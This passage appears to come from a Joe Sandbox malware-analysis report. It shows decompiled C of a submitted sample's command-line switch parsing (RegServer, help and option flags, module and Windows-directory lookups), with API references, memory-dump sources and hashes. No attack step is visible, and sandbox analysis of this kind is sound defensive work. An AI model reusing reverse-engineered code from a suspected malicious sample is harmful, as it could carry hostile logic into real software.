                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												if(_t213 != 0) {
                                                                                                                                                                                                                                            													_t163 = 1;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t213 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L131;
                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                            								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                            								_t69 = _v272;
                                                                                                                                                                                                                                            							} while ( *_t69 != 0);
                                                                                                                                                                                                                                            							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                            								E00A46E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                            								asm("int3");
                                                                                                                                                                                                                                            								_push(_t221);
                                                                                                                                                                                                                                            								_t222 = _t223;
                                                                                                                                                                                                                                            								_t71 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                            									0x4f0 = 2;
                                                                                                                                                                                                                                            									_t75 = E00A4597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A444B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                            									 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            									_t75 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								return E00A46CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										_t79 = _v268;
                                                                                                                                                                                                                                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                            											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                            											if(_t83 == 0) {
                                                                                                                                                                                                                                            												_t202 = 0x521;
                                                                                                                                                                                                                                            												E00A444B9(0, 0x521, 0xa41140, 0, 0x40, 0);
                                                                                                                                                                                                                                            												_t85 =  *0xa48588; // 0x0
                                                                                                                                                                                                                                            												if(_t85 != 0) {
                                                                                                                                                                                                                                            													CloseHandle(_t85);
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												ExitProcess(0);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E00A4667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E00A4667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E00A45C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E00A41680(0xa48c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E00A4667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E00A4667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0xa48a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E00A45C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0xa48b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0xa48a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E00A41680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E00A4658A(_t218, 0x104, 0xa41140);
                                                                                                                                                                                                                                            																if(E00A431E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0xa48a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0xa48a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0xa48a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0xa48a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0xa48a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0xa49a2c = 1;
                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0xa49a2c =  *0xa49a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0xa48d48 =  *0xa48d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0xa49a2c =  *0xa49a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0xa49a2c =  *0xa49a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0xa48d48 =  *0xa48d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0xa49a2c =  *0xa49a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0xa48a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0xa49a2c = 3;
                                                                                                                                                                                                                                            																	 *0xa48a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0xa48a2c != 0 &&  *0xa48b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa49a3c, 0xa48b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E00A466C8(0xa48b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a46207
                                                                                                                                                                                                                                            0x00a4620a
                                                                                                                                                                                                                                            0x00a4620b
                                                                                                                                                                                                                                            0x00a4620e
                                                                                                                                                                                                                                            0x00a46217
                                                                                                                                                                                                                                            0x00a45d78
                                                                                                                                                                                                                                            0x00a45d78
                                                                                                                                                                                                                                            0x00a45d80
                                                                                                                                                                                                                                            0x00a45d83
                                                                                                                                                                                                                                            0x00a45d84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d84
                                                                                                                                                                                                                                            0x00a45d5d
                                                                                                                                                                                                                                            0x00a45d5f
                                                                                                                                                                                                                                            0x00a45d62
                                                                                                                                                                                                                                            0x00a45d68
                                                                                                                                                                                                                                            0x00a45d64
                                                                                                                                                                                                                                            0x00a45d64
                                                                                                                                                                                                                                            0x00a45d64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d62
                                                                                                                                                                                                                                            0x00a45d5b
                                                                                                                                                                                                                                            0x00a45d4f
                                                                                                                                                                                                                                            0x00a45d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d9f
                                                                                                                                                                                                                                            0x00a45d9f
                                                                                                                                                                                                                                            0x00a45da5
                                                                                                                                                                                                                                            0x00a45dab
                                                                                                                                                                                                                                            0x00a45dba
                                                                                                                                                                                                                                            0x00a46218
                                                                                                                                                                                                                                            0x00a4621d
                                                                                                                                                                                                                                            0x00a46220
                                                                                                                                                                                                                                            0x00a46221
                                                                                                                                                                                                                                            0x00a46229
                                                                                                                                                                                                                                            0x00a46230
                                                                                                                                                                                                                                            0x00a46247
                                                                                                                                                                                                                                            0x00a4626a
                                                                                                                                                                                                                                            0x00a46272
                                                                                                                                                                                                                                            0x00a46249
                                                                                                                                                                                                                                            0x00a46255
                                                                                                                                                                                                                                            0x00a4625f
                                                                                                                                                                                                                                            0x00a46264
                                                                                                                                                                                                                                            0x00a46264
                                                                                                                                                                                                                                            0x00a46284
                                                                                                                                                                                                                                            0x00a45dc0
                                                                                                                                                                                                                                            0x00a45dc0
                                                                                                                                                                                                                                            0x00a45dca
                                                                                                                                                                                                                                            0x00a45e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45dcc
                                                                                                                                                                                                                                            0x00a45dce
                                                                                                                                                                                                                                            0x00a45e24
                                                                                                                                                                                                                                            0x00a45e24
                                                                                                                                                                                                                                            0x00a45e2c
                                                                                                                                                                                                                                            0x00a45e47
                                                                                                                                                                                                                                            0x00a45e4a
                                                                                                                                                                                                                                            0x00a461d2
                                                                                                                                                                                                                                            0x00a461e2
                                                                                                                                                                                                                                            0x00a461e7
                                                                                                                                                                                                                                            0x00a461ee
                                                                                                                                                                                                                                            0x00a461f1
                                                                                                                                                                                                                                            0x00a461f1
                                                                                                                                                                                                                                            0x00a461f8
                                                                                                                                                                                                                                            0x00a461f8
                                                                                                                                                                                                                                            0x00a45e50
                                                                                                                                                                                                                                            0x00a45e53
                                                                                                                                                                                                                                            0x00a46109
                                                                                                                                                                                                                                            0x00a4611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46125
                                                                                                                                                                                                                                            0x00a46137
                                                                                                                                                                                                                                            0x00a4613a
                                                                                                                                                                                                                                            0x00a4613c
                                                                                                                                                                                                                                            0x00a4613e
                                                                                                                                                                                                                                            0x00a4613e
                                                                                                                                                                                                                                            0x00a46141
                                                                                                                                                                                                                                            0x00a46141
                                                                                                                                                                                                                                            0x00a46143
                                                                                                                                                                                                                                            0x00a46144
                                                                                                                                                                                                                                            0x00a4614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46150
                                                                                                                                                                                                                                            0x00a46152
                                                                                                                                                                                                                                            0x00a4615c
                                                                                                                                                                                                                                            0x00a46170
                                                                                                                                                                                                                                            0x00a46172
                                                                                                                                                                                                                                            0x00a4617c
                                                                                                                                                                                                                                            0x00a46190
                                                                                                                                                                                                                                            0x00a46190
                                                                                                                                                                                                                                            0x00a46196
                                                                                                                                                                                                                                            0x00a461a5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a461ab
                                                                                                                                                                                                                                            0x00a461b9
                                                                                                                                                                                                                                            0x00a461c6
                                                                                                                                                                                                                                            0x00a461c6
                                                                                                                                                                                                                                            0x00a4617e
                                                                                                                                                                                                                                            0x00a46180
                                                                                                                                                                                                                                            0x00a4618a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4618a
                                                                                                                                                                                                                                            0x00a4615e
                                                                                                                                                                                                                                            0x00a46160
                                                                                                                                                                                                                                            0x00a4616a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45ef9
                                                                                                                                                                                                                                            0x00a45efc
                                                                                                                                                                                                                                            0x00a45f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45efe
                                                                                                                                                                                                                                            0x00a45eff
                                                                                                                                                                                                                                            0x00a45f02
                                                                                                                                                                                                                                            0x00a45f16
                                                                                                                                                                                                                                            0x00a45f04
                                                                                                                                                                                                                                            0x00a45f07
                                                                                                                                                                                                                                            0x00a45f0d
                                                                                                                                                                                                                                            0x00a45f46
                                                                                                                                                                                                                                            0x00a45f46
                                                                                                                                                                                                                                            0x00a45f09
                                                                                                                                                                                                                                            0x00a45f09
                                                                                                                                                                                                                                            0x00a45f09
                                                                                                                                                                                                                                            0x00a45f07
                                                                                                                                                                                                                                            0x00a45f02
                                                                                                                                                                                                                                            0x00a45efc
                                                                                                                                                                                                                                            0x00a45ef7
                                                                                                                                                                                                                                            0x00a45ef2
                                                                                                                                                                                                                                            0x00a45f4c
                                                                                                                                                                                                                                            0x00a45f4e
                                                                                                                                                                                                                                            0x00a45f50
                                                                                                                                                                                                                                            0x00a45f54
                                                                                                                                                                                                                                            0x00a45ed4
                                                                                                                                                                                                                                            0x00a45ea2
                                                                                                                                                                                                                                            0x00a45ea4
                                                                                                                                                                                                                                            0x00a45eaf
                                                                                                                                                                                                                                            0x00a45eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e79
                                                                                                                                                                                                                                            0x00a45e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e83
                                                                                                                                                                                                                                            0x00a45e83
                                                                                                                                                                                                                                            0x00a45e83
                                                                                                                                                                                                                                            0x00a45e85
                                                                                                                                                                                                                                            0x00a45e85
                                                                                                                                                                                                                                            0x00a45e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e94
                                                                                                                                                                                                                                            0x00a45e8e
                                                                                                                                                                                                                                            0x00a45e7d
                                                                                                                                                                                                                                            0x00a45e77
                                                                                                                                                                                                                                            0x00a45e6e
                                                                                                                                                                                                                                            0x00a45e65
                                                                                                                                                                                                                                            0x00a45e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45dd0
                                                                                                                                                                                                                                            0x00a45dd0
                                                                                                                                                                                                                                            0x00a45dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45dd0
                                                                                                                                                                                                                                            0x00a45dce
                                                                                                                                                                                                                                            0x00a45dca
                                                                                                                                                                                                                                            0x00a45dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d00
                                                                                                                                                                                                                                            0x00a45dd9
                                                                                                                                                                                                                                            0x00a45e04
                                                                                                                                                                                                                                            0x00a461fe
                                                                                                                                                                                                                                            0x00a45e0a
                                                                                                                                                                                                                                            0x00a45e0c
                                                                                                                                                                                                                                            0x00a45e17
                                                                                                                                                                                                                                            0x00a45e17
                                                                                                                                                                                                                                            0x00a45e04
                                                                                                                                                                                                                                            0x00a46200
                                                                                                                                                                                                                                            0x00a46200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00A45CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00A48B3E,00000104,00000000,?,?), ref: 00A45DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A45E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00A45EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A45F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A45FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00A46008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A460AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00A41140,00000000,00000040,00000000), ref: 00A461F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00A461F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: 44c67f821142a378932edfa6ec1e77b768871fbd78f7f3c260be7987f73bacef
                                                                                                                                                                                                                                            • Instruction ID: 394c94ce3314c098522f0d7d6f86e5a2795348be340c26d5a65d7d94b1a8bd56
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44c67f821142a378932edfa6ec1e77b768871fbd78f7f3c260be7987f73bacef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60D1487DE04A445FDB39CB789C493FA7B61ABD7340F1441AAC486C7192DAB58E878B02
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E00A418A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0xa48128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
